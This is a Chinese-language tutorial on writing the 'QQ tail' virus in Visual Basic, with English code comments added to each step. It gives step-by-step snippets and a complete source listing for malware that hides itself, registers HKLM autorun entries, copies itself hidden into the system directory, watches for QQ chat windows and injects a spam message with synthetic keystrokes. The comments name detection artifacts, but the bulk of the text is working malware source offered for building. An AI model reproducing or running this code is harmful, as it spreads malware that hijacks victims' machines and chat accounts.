QQ尾巴病毒制作
QQ尾巴过时好久了,俺再写一个!!让大家学几个API!!^^
在家玩得很无聊,除了吃就是睡,日子一天天地过去了,QQ却帮我打发了不少时间.事发那天,一个好友发
给我一条信息,说是某个网站有好听的音乐叫我上去听听,于是我点击了那个网址上去了,然而我却没有发现
那个网站有什么音乐听.随即我便用QQ发信息,谁知当我打开聊天窗口时,QQ那家伙立刻帮我发了一条信息给
对方,和我刚才收到的那条一模一样,哈哈,好一个QQ尾巴.于是我马上check run,发现注册表RUN项多了两个
可疑的项,于是删掉它,并根据路径把它KILL掉.
反正在家无聊于是研究一下它,当我运行它时
1.它会使自身在桌面和任务栏上隐藏;
2.在注册表的RUN项建一个子键使之能开机自动运行;
3.复制自己到系统目录下,并隐藏;
4.监视桌面前台窗口,并捕捉QQ聊天窗口;
5.当发现QQ窗口时就立刻模拟键盘将一条信息复制上去并发送.
就这么简单!它没有用到HOOK钩子截取系统消息,想了想,哈,俺用VB也能写一个,不就是几个常用的API
嘛.反正无聊,开工.......
首先介绍一下要用到的API吧
1.GetWindow 取得所属窗口句柄;
2.ShowWindow 窗口设置;
3.GetSystemDirectory 取得系统目录路径;
4.RegCreateKey 创建或打开注册表的项;
5.RegSetValueEx 在已打开的项下写入键值(不是子键);
6.RegCloseKey 关闭注册表;
7.GetForegroundWindow 取得前台窗口句柄;
8.GetWindowText 取得前台窗口的标题;
9.Keybd_event 模拟键盘事件.
第一步:隐藏!!
API声明: GetWindow ShowWindow
常数: GW_OWNER SW_HIDE
' Hides the form and its owner window (SW_HIDE). Nothing here hides the process itself,
' so it remains visible to process-listing tools.
dim a as long
a=GetWindow(me.hwnd , GW_OWNER)
ShowWindow a , SW_HIDE
me.visible=false
第二步:取得系统目录路径!
API声明: GetSystemDirectory
' Asks Windows for the system directory path, using a fixed 19-character buffer.
dim b as string
b=space(19)
GetSystemDirectory b , 20
第三步:修改注册表!
API声明: RegCreateKey RegSetValueEx RegCloseKey
常数: HKEY_LOCAL_MACHINE,REG_SZ
' Writes a REG_SZ value named "file32" under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
' whose data is the path built from b plus "\file32.exe". The API return codes are not checked.
' Detection: an autorun value with this name, or any unexpected value in this key, is the
' persistence artifact to look for when auditing startup entries.
dim c as string
dim d as string
dim e as long
c="SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
d=b & "\file32.exe"
RegCreateKey HKEY_LOCAL_MACHINE , c , e
RegSetValueEx e , "file32" , 0 , REG_SZ , byval d , len(d)
RegCloseKey e
第四步:复制自己到系统目录下,并隐藏!
' Copies the running executable to the path held in d and then changes that file's attributes.
' Detection: a hidden executable in the system directory that an autorun entry points to.
dim f as string
f=app.path & "\" & app.exename & ".exe"
filecopy f , d
setarrt d , vbhiden
第五步:监视前台窗口!
API声明: GetForegroundWindow GetWindowText
' Reads the title of the current foreground window into h.
dim g as long
dim h as string
h=space(256)
g=GetForegroundWindow()
GetWindowText g , h , 255
' Check whether the foreground window is a QQ chat window: if so go to step six, otherwise keep monitoring.
' This code is meant to run inside a Timer event.
' The only test is that the title's first character is "与"; no process or window class is checked.
if left(h,1)="与" then
call stup six(第六步)
end if
第六步:设定剪切板内容,并模拟键盘(CTRL+V)粘贴,(ENTER OR ENTER+CTRL)发送!
API声明: Keybd_event
常数: vk_control(&h11) vk_v(86) keyeventf_keyup(&h2)
' Replaces the clipboard with a fixed message, then injects synthetic keystrokes into whatever
' window has focus: Ctrl+V, Enter, Ctrl+Enter (key codes as listed in the constants line above).
' Side effect visible to the user: whatever was on the clipboard is lost.
clipboard.clear
clipboard.settext "恭喜你,高中了QQ尾巴病毒!"
keybd_ecent vk_control,0,0,0
keybd_event 86,0,0,0
keybd_ecent 86,0,keyeventf_keyup,0
keybd_event vk_control,0,keyeventf_keyup,0
keybd_ecent 13,0,0,0
keybd_ecent 13,0,keyeventf_keyup,0
keybd_event vk_control,0,0,0
keybd_ecent 13,0,0,0
keybd_event 13,0,keyeventf_keyup,0
keybd_event vk_control,0,keyeventf_keyup,0
clipboard.clear
完整代码如下:
' Win32 imports and module state for the sample.
' For triage, the import set is informative on its own: window hiding (ShowWindow),
' HKLM registry writes (RegCreateKeyA / RegSetValueExA), foreground-window title reads
' (GetForegroundWindow / GetWindowTextA) and synthetic keyboard input (keybd_event).

' Window handling: used to hide the form's owner window.
Private Declare Function GetWindow Lib "user32" (ByVal hwnd As Long, ByVal wCmd As Long) As Long
Private Declare Function ShowWindow Lib "user32" (ByVal hwnd As Long, ByVal nCmdShow As Long) As Long
Private Const GW_OWNER = 4
Private Const SW_HIDE = 0
' System directory lookup (ANSI variant).
Private Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
' Registry access (ANSI variants), used on HKEY_LOCAL_MACHINE with REG_SZ data.
Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long ' Note that if you declare the lpData parameter as String, you must pass it By Value.
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Private Const HKEY_LOCAL_MACHINE = &H80000002
Private Const REG_SZ = 1
' Foreground window handle and title text.
Private Declare Function GetForegroundWindow Lib "user32" () As Long
Private Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
' Synthetic keyboard input.
Private Declare Sub keybd_event Lib "user32" (ByVal bVk As Byte, ByVal bScan As Byte, ByVal dwFlags As Long, ByVal dwExtraInfo As Long)
Private Const KEYEVENTF_KEYUP = &H2
' Module-level state:
'   j  - window title captured by Timer1_Timer for the current trigger
'   k  - window title that mer last acted on (compared with j before sending again)
'   ii - tick counter advanced by Timer1_Timer
'   e, f - set to the two copy destinations in Form_Load; not read anywhere else in this listing
Dim j As String
Dim k As String
Dim ii As Integer
Dim e, f As String
' Form_Load: runs once at startup. It hides the UI, registers two autorun values under HKLM
' and copies the running executable to two destinations with the hidden attribute set.
' Host artifacts a defender can check for, all taken from the literals below:
'   - value "File32" under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
'   - value "Rencom" under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
'   - hidden files named File32.exe and Rencom.exe at the paths derived from the system directory
' Writing under HKEY_LOCAL_MACHINE affects every user of the machine, not only the current one.
Private Sub Form_Load()
Dim a As Long
Dim b As String
Dim c, d As String
Dim e1 As String
Dim e2 As String
Dim f1, f2 As Long
' Hide the form and its owner window, so no window or taskbar button is shown.
Me.Visible = False
a = GetWindow(Me.hwnd, GW_OWNER)
ShowWindow a, SW_HIDE
' Fetch the system directory into a fixed 19-character buffer.
b = Space(19)
GetSystemDirectory b, 20
c = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
d = "SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices"
' e1 is built from the whole buffer; e2 only from its first 11 characters.
' NOTE(review): the resulting directories depend on the machine's system path length - confirm on the target OS.
e1 = b & "\File32.exe"
e2 = Left(b, 11) & "Rencom.exe"
' Autorun registration; the return codes of the registry calls are not checked.
RegCreateKey HKEY_LOCAL_MACHINE, c, f1
RegSetValueEx f1, "File32", 0, REG_SZ, ByVal e1, Len(e1)
RegCloseKey f1
RegCreateKey HKEY_LOCAL_MACHINE, d, f2
RegSetValueEx f2, "Rencom", 0, REG_SZ, ByVal e2, Len(e2)
RegCloseKey f2
' From here on runtime errors are suppressed, so a failed copy or attribute change goes unreported.
On Error Resume Next
Dim g As String
' g is the full path of the currently running executable.
g = App.Path & "\" & App.EXEName & ".exe"
FileCopy g, e1
SetAttr e1, vbHidden
FileCopy g, e2
SetAttr e2, vbHidden
' Keep both destination paths in module-level variables.
e = e1
f = e2
End Sub
' Timer1_Timer: on every timer tick, reads the foreground window title and calls mer
' when the title starts with "与" and the tick counter matches the throttle condition.
' The timer interval is set elsewhere (form designer) and is not visible in this listing.
' The match is on the title's first character only; the owning process and window class are not checked.
Private Sub Timer1_Timer()
' Tick counter, reset to 1 when it reaches 1111.
ii = ii + 1
If ii = 1111 Then ii = 1
Dim h As Long
Dim i As String
h = GetForegroundWindow()
i = Space(256)
GetWindowText h, i, 255
' Acts only on ticks where ii Mod 20 = 8, i.e. once every 20 ticks.
If Left(i, 1) = "与" And ii Mod 20 = 8 Then
j = Space(256)
' Hand the captured title to mer through the module-level variable j.
j = i
Call mer
End If
End Sub
' mer: pastes a fixed message into the focused window and submits it with synthetic keystrokes,
' at most once in a row per window title (k holds the title last acted on).
' Observable side effects: the user's clipboard content is replaced by the message, and the
' keystrokes go to whichever window has input focus when they are injected.
Sub mer()
' Skip when this title is the same one that was acted on last time.
If k <> j Then
Clipboard.Clear
Clipboard.SetText "恭喜你,高中了QQ尾巴病毒!"
' &H11 = Ctrl, 86 = V: Ctrl+V (paste).
keybd_event &H11, 0, 0, 0
keybd_event 86, 0, 0, 0
keybd_event 86, 0, KEYEVENTF_KEYUP, 0
keybd_event &H11, 0, KEYEVENTF_KEYUP, 0
' 13 = Enter: plain Enter, then Ctrl+Enter, covering both send-key settings.
keybd_event 13, 0, 0, 0
keybd_event 13, 0, KEYEVENTF_KEYUP, 0
keybd_event &H11, 0, 0, 0
keybd_event 13, 0, 0, 0
keybd_event 13, 0, KEYEVENTF_KEYUP, 0
keybd_event &H11, 0, KEYEVENTF_KEYUP, 0
' Remember this title so the same window is not messaged again on the next trigger.
k = Space(256)
k = j
End If
End Sub
QQ尾巴病毒是用Visual C++来实现的!
QQ尾巴病毒的Visual C++实现探讨
http://www.jclm88.com/article/16/162/567/2006/200607142072.html
QQ尾巴病毒制作
http://www.ndsftc.com/bbs/dispbbs.asp?boardid=27&id=224